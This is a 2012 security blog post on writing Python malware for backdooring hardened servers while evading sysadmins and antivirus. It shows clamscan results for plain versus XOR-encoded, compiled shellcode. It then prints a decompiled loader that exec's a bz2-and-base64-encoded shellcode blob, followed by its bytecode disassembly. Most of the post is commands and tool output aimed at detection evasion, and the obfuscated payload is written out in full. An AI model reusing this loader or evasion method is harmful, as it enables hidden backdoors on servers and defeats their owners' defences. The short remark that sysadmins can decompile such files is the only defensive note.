Information Security

Blogroll

AMol NAik
Andrew Case
Andre M. DiMino
Attila Axt
Bruce Schneier
Didier Stevens
Eric Romang
Francois Ropert
Gal Badishi
Gianluca Brindisi
Haroon Meer
Krzysztof Kotowicz
Lvdeijk
Michael Ligh
Mila Parkour
Miroslav Stampar
Pedro Vilaca
Rich Lundeen
Rob Fuller

Creative Commons License


Best view with Chromium devel without JavaScript enabled

28th June 2012

Post

Python Malware

Use Python useful when backdooring hardened/secure server (GCC removed) because most servers still need Python or Perl but we need undetectable malware (means from SysAdmin and AntiVirus).

This shellcode without XOR encoded

% clamscan shellCodes.*
shellCodes.py: OK
shellCodes.pyc: Exploit.Fnstenv_mov-1 FOUND

—————- SCAN SUMMARY —————-
Known viruses: 1258678
Engine version: 0.97.5
Scanned directories: 0
Scanned files: 2
Infected files: 1
Data scanned: 0.06 MB
Data read: 0.04 MB (ratio 1.67:1)
Time: 3.531 sec (0 m 3 s)

naked Python source code can be detected by SysAdmin

compiled Python byte code may be not detected by lazy SysAdmin but definitely detected by AntiVirus

your choice!

nope,give me another choice.

»> import py_compile
»> py_compile.compile(“zsh.py”)

This shellcode with XOR encoded

% clamscan zsh.*
zsh.py: OK
zsh.pyc: OK

—————- SCAN SUMMARY —————-
Known viruses: 1258678
Engine version: 0.97.5
Scanned directories: 0
Scanned files: 2
Infected files: 0
Data scanned: 0.00 MB
Data read: 0.00 MB (ratio 0.00:1)
Time: 3.543 sec (0 m 3 s)

yes, with XOR encoded and Compiled Python byte code is the best.

So if you are great SysAdmin you may want to check the files

(REpdb:default) fs_um_decompile zshmin.pyc
[+] Decompiling single file: zshmin.pyc
[=] Decompiling zshmin.py-<module>
[+] Parsing code object of <code object <module> at 0x85bd0f8, file “zshmin.py”, line 2>
[+] Disassembling….
[+] Decompiling….
[+] All code blocks got
[+] Flow graph from code blocks got
[+] DFA decompiled
[+] Complex IF’s simplified
[+] WHILE loops preprocessed
[+] All compounds simplified
[+] Consecutives simplified
[+] Source code written to: /path/to/pyretic/Projects/default/sourcecode/fs_um/singlefile/zshmin.py

% cat /path/to/pyretic/Projects/default/sourcecode/fs_um/singlefile/zshmin.py

# The minified version of zsh.py (http://www.shell-storm.org/shellcode/files/shellcode-810.php)
import bz2, base64
exec bz2.decompress(base64.b64decode(‘QlpoOTFBWSZTWX+u+NoAAHBfgAAQUHR/4gsBRiS/599gMADFthoKnpqaGJgTIyBkybTUNBqYptSPU8iAMjIyaBmppphqENAAAAaAANBGMGOkc/mp+b4Q/TjBquoHQ8q7FKMytMrBmaNM4FUiCWsuTYVKwmrgro0k634X45JjlJLvoCDFZqZg1wn5CFpGpGnLS13zmFhI4JTCHpNBL0PUHxnNXhppUwg8xEjPg6NEAvK4jYJObxIgOQry9BstTgJIOg/DssGqFTFCgMy/ZueQlpj4EHSkGV/VFRnaNYZ6Bd8Ta2umItkQiLB22CG7s3+wMDFD8xdyRThQkH+u+No=’))

or we can use dis or byteplay

co_name
‘<module>’


co_filename
‘zshmin.py’


co_argcount
0


co_nlocals
0


co_stacksize
3


co_flags
64: CO_NOFREE


co_consts
-1: <type ‘int’>
None: <type ‘NoneType’>
‘QlpoOTFBWSZTWX+u+NoAAHBfgAAQUHR/4gsBRiS/599gMADFthoKnpqaGJgTIyBkybTUNBqYptSPU8iAMjIyaBmppphqENAAAAaAANBGMGOkc/mp+b4Q/TjBquoHQ8q7FKMytMrBmaNM4FUiCWsuTYVKwmrgro0k634X45JjlJLvoCDFZqZg1wn5CFpGpGnLS13zmFhI4JTCHpNBL0PUHxnNXhppUwg8xEjPg6NEAvK4jYJObxIgOQry9BstTgJIOg/DssGqFTFCgMy/ZueQlpj4EHSkGV/VFRnaNYZ6Bd8Ta2umItkQiLB22CG7s3+wMDFD8xdyRThQkH+u+No=’: <type ‘str’>


co_names
‘bz2’
‘base64’
‘decompress’
‘b64decode’


co_varnames


co_freevars


co_cellvars

disas

2(‘zshmin.py’)
064 0000LOAD_CONST0(-1: <type ‘int’>)
364 0100LOAD_CONST1(None: <type ‘NoneType’>)
66c 0000IMPORT_NAME0(‘bz2’)
95a 0000STORE_NAME0(‘bz2’)
1264 0000LOAD_CONST0(-1: <type ‘int’>)
1564 0100LOAD_CONST1(None: <type ‘NoneType’>)
186c 0100IMPORT_NAME1(‘base64’)
215a 0100STORE_NAME1(‘base64’)


3(‘zshmin.py’)
2465 0000LOAD_NAME0(‘bz2’)
276a 0200LOAD_ATTR2(‘decompress’)
3065 0100LOAD_NAME1(‘base64’)
336a 0300LOAD_ATTR3(‘b64decode’)
3664 0200LOAD_CONST2(‘QlpoOTFBWSZTWX+u+NoAAHBfgAAQUHR/4gsBRiS/599gMADFthoKnpqaGJgTIyBkybTUNBqYptSPU8iAMjIyaBmppphqENAAAAaAANBGMGOkc/mp+b4Q/TjBquoHQ8q7FKMytMrBmaNM4FUiCWsuTYVKwmrgro0k634X45JjlJLvoCDFZqZg1wn5CFpGpGnLS13zmFhI4JTCHpNBL0PUHxnNXhppUwg8xEjPg6NEAvK4jYJObxIgOQry9BstTgJIOg/DssGqFTFCgMy/ZueQlpj4EHSkGV/VFRnaNYZ6Bd8Ta2umItkQiLB22CG7s3+wMDFD8xdyRThQkH+u+No=’: <type ‘str’>)
3983 0100CALL_FUNCTION1(pos args: 1, key args: 0)
4283 0100CALL_FUNCTION1(pos args: 1, key args: 0)
4564 0100LOAD_CONST1(None: <type ‘NoneType’>)
4804DUP_TOP
4955EXEC_STMT
5064 0100LOAD_CONST1(None: <type ‘NoneType’>)
5353RETURN_VALUE

hex show base64 string

the shellcode is 32bit but i analyze in 64bit machine.

Tagged: HardeningMalwareObfuscatingPythonReverse EngineeringShellcodex86x86_64System V

() 

ABOUT THE AUTHOR
            
Teguh is an idealist pwner living encrypted in Indonesia.
He is passionate about security and currently defeating the CWE top 25.
He also can be found on Google+, Twitter, GitHub, Shelfari and your libc.